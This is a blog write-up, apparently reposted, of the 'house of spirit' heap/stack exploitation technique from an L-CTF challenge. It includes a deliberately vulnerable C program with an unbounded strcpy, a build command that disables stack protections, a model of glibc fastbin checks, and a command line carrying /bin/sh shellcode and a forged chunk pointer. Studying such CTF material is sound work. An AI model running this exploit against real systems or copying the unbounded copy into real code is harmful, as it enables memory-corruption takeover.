I studied a stack overflow exploitation technique presented at L-CTF and am writing it down here.
The sample code is as follows:
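/*
 * blackngel's vulnerable program slightly modified by gb_master
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fvuln(char *str1, int age)
{
    char *ptr1, name[32];
    int local_age;
    char *ptr2;

    local_age = age;

    ptr1 = (char *) malloc(256);
    printf("\nPTR1 = [ %p ]", ptr1);
    /* Deliberately unbounded copy: input longer than 32 bytes runs past
       name into the neighbouring locals (ptr2, ptr1, local_age). */
    strcpy(name, str1);
    printf("\nPTR1 = [ %p ]\n", ptr1);

    /* ptr1 may have been overwritten by the copy above. */
    free(ptr1);

    /* A request of 40 bytes is served from the fastbin for that size. */
    ptr2 = (char *) malloc(40);

    snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
    printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
    /* Padding words that sit on the stack above fvuln's frame. */
    int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};

    if (argc == 3)
        fvuln(argv[1], atoi(argv[2]));

    return 0;
}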
The compile command is as follows:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
Compiling on Ubuntu 14 Server requires installing the development package first; otherwise the build fails because sys/cdefs.h cannot be found:
sudo apt-get install libc6-dev-i386
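The key idea is this: use the overflow to change the address held in a local variable to an address on the stack, and set the size field of the forged chunk at that address to a valid fastbin size so that it can be freed successfully. The later malloc then hands this memory out again for use, and snprintf writes data into it, which can overwrite the function's return address and finally get a shell.
The local variables are laid out in memory as follows: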
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
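The conditions the key idea above relies on, as an added example that is not code from the original post: a simplified C model of the checks a 32-bit glibc free() of that era makes on the fastbin path, showing why age is 48 and why malloc(40) then returns the forged chunk. It assumes the forged size field is local_age at 0xffffd064 (so the chunk header starts at 0xffffd060) and that the 10 in main's pad array is the word read as the next chunk's size; the constants and function names are illustrative.

```c
/* Added example: simplified model of the checks free() makes before putting
 * a chunk on a fastbin. Constants are assumed 32-bit glibc defaults; this is
 * not glibc source, and it ignores the tcache that newer versions add. */
#include <stdint.h>
#include <stdio.h>

#define SIZE_SZ    4u        /* sizeof(size_t) on i386 */
#define ALIGN_MASK 7u        /* MALLOC_ALIGNMENT (8) - 1, also the flag bits */
#define MINSIZE    16u
#define MAX_FAST   64u       /* assumed default fastbin limit on i386 */
#define SYSTEM_MEM 0x21000u  /* assumed arena size after the first malloc */
#define IS_MMAPPED 2u
#define NON_MAIN   4u

enum verdict { ACCEPTED, NOT_FASTBIN, FOREIGN_ARENA, BAD_POINTER,
               BAD_SIZE, BAD_NEXT_SIZE };

/* Chunk size malloc() actually uses for a request of req bytes. */
uint32_t request_to_chunk_size(uint32_t req)
{
    uint32_t sz = (req + SIZE_SZ + ALIGN_MASK) & ~ALIGN_MASK;
    return sz < MINSIZE ? MINSIZE : sz;
}

/* chunk: header address (user pointer - 8); size_field: word at chunk + 4;
 * next_size_field: word at chunk + size + 4. */
enum verdict fastbin_free_check(uint32_t chunk, uint32_t size_field,
                                uint32_t next_size_field)
{
    uint32_t size = size_field & ~ALIGN_MASK;

    if (size_field & IS_MMAPPED) return NOT_FASTBIN;   /* goes to munmap */
    if (size_field & NON_MAIN)   return FOREIGN_ARENA; /* arena derived from pointer */
    if (chunk > 0u - size || (chunk & ALIGN_MASK))
        return BAD_POINTER;                  /* "free(): invalid pointer" */
    if (size < MINSIZE)  return BAD_SIZE;    /* "free(): invalid size" */
    if (size > MAX_FAST) return NOT_FASTBIN; /* normal path, more checks */
    if (next_size_field <= 2 * SIZE_SZ ||
        (next_size_field & ~ALIGN_MASK) >= SYSTEM_MEM)
        return BAD_NEXT_SIZE;                /* "invalid next size (fast)" */
    /* Nothing above asks whether chunk lies inside the heap at all. */
    return ACCEPTED;
}

int main(void)
{
    /* age = 48 is from the page; header address and next size are assumed. */
    printf("malloc(40) uses chunk size %u\n", request_to_chunk_size(40));
    printf("verdict for size 48, next size 10: %d\n",
           (int)fastbin_free_check(0xffffd060u, 48, 10));
    return 0;
}
```

In this model none of the checks tie the pointer to the heap, which is why a stack address with a plausible size word and a plausible following size word is accepted.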
The sample test command is as follows:
./hos `python -c 'import sys; sys.stdout.write("\x31\xc0\xeb\x14\x44\xd0\xff\xff\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80\x90" + "\x01\x01\x01\x68\xd0\xFF\xFF" + "\x30")'` 48
There is a small problem here: under GDB it gets a shell, but running it directly reports a segmentation fault:
This article was published by 主机参考 (zhujicankao.com); when reposting, please credit: [Overflow exploitation techniques] house of spirit friendly stack overflow https://zhujicankao.com/12459.html